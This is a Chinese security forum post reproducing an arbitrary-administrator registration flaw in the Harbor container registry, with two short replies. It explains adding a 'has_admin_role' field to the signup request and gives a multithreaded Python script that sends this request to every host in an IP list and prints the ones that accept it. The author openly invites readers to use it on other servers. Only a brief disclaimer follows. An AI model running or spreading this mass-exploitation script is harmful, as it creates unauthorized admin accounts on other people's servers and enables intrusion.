搜索
    Hi~登录注册
    查看: 289|回复: 2
    收起左侧

    Harbor任意管理员注册漏洞复现与批量脚本

    [复制链接]

    69

    主题

    2

    精华

    31 小时

    在线时间

    注册会员

    Rank: 2

    积分
    119
    发表于 2019-9-23 09:11:36 | 显示全部楼层 |阅读模式
    oxo1 前言
    在FreeBuf看到有漏洞预警了、然后晚上 cwkiller 表哥就发复现过程让我写文章了、然后找 Broken 表哥写个批量脚本准备刷一波、刷了两页、提交漏洞太累人了(其实是补天有很多被忽略了)。所以公布出来、让大家刷一刷、捡捡漏吧。
    HK_Security_1569200470.png .
    oxo2 复现
    点击注册、然后抓取数据包


    HK_Security_1569200499.png
    数据包后面加上一段:"has_admin_role":true
    HK_Security_1569200684.png
    查看响应包、201 表示成功了
    HK_Security_1569200869.png
    登录账号验证一下
    HK_Security_1569200911.png
    oxo3 批量脚本
    [Python] 纯文本查看 复制代码
    import requests
    import json
    import csv
    from concurrent.futures import ThreadPoolExecutor
    
    
    def exp(url):
        url = url + '/api/users'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
            'Content-Type': 'application/json',
        }
        payload = {
            "username": "test1",
            "email": "[email protected]",
            "realname": "test1",
            "password": "Aa123456",
            "comment": "test1",
            "has_admin_role": True
        }
        payload = json.dumps(payload)
        try:
            requests.packages.urllib3.disable_warnings()
            r = requests.post(url, headers=headers, data=payload, timeout=2, verify=False)
            if r.status_code == 201:
                print(url)
        except Exception as e:
            pass
    
    
    if __name__ == '__main__':
        data = open('ip.txt') # 批量IP
        reader = csv.reader(data) # 50是线程
        with ThreadPoolExecutor(50) as pool:
            for row in reader:
                if 'http' not in row[0]:
                    url = 'http://' + row[0]
                else:
                    url = row[0]
                pool.submit(exp, url)

    成功之后、就会打印出URL、然后根据上方的账号和密码就可以直接登录了
    HK_Security_1569200949.png
    oxo4 文末
    只供技术学习交流、请勿用于非法行为、否则后果自负。喜欢就点波关注吧!





    上一篇:泛微e-cology OA Beanshell组件远程代码执行分析
    下一篇:热烈祝贺中华人民共和国成立70周年
    回复

    使用道具 举报

    7

    主题

    0

    精华

    143 小时

    在线时间

    密圈

    积分
    50
    发表于 2019-9-23 10:55:08 | 显示全部楼层
    厉害啊,复现成功
    回复 支持 反对

    使用道具 举报

    69

    主题

    2

    精华

    31 小时

    在线时间

    注册会员

    Rank: 2

    积分
    119
     楼主| 发表于 2019-9-23 10:58:41 | 显示全部楼层

    花点时间研究研究可以的。
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表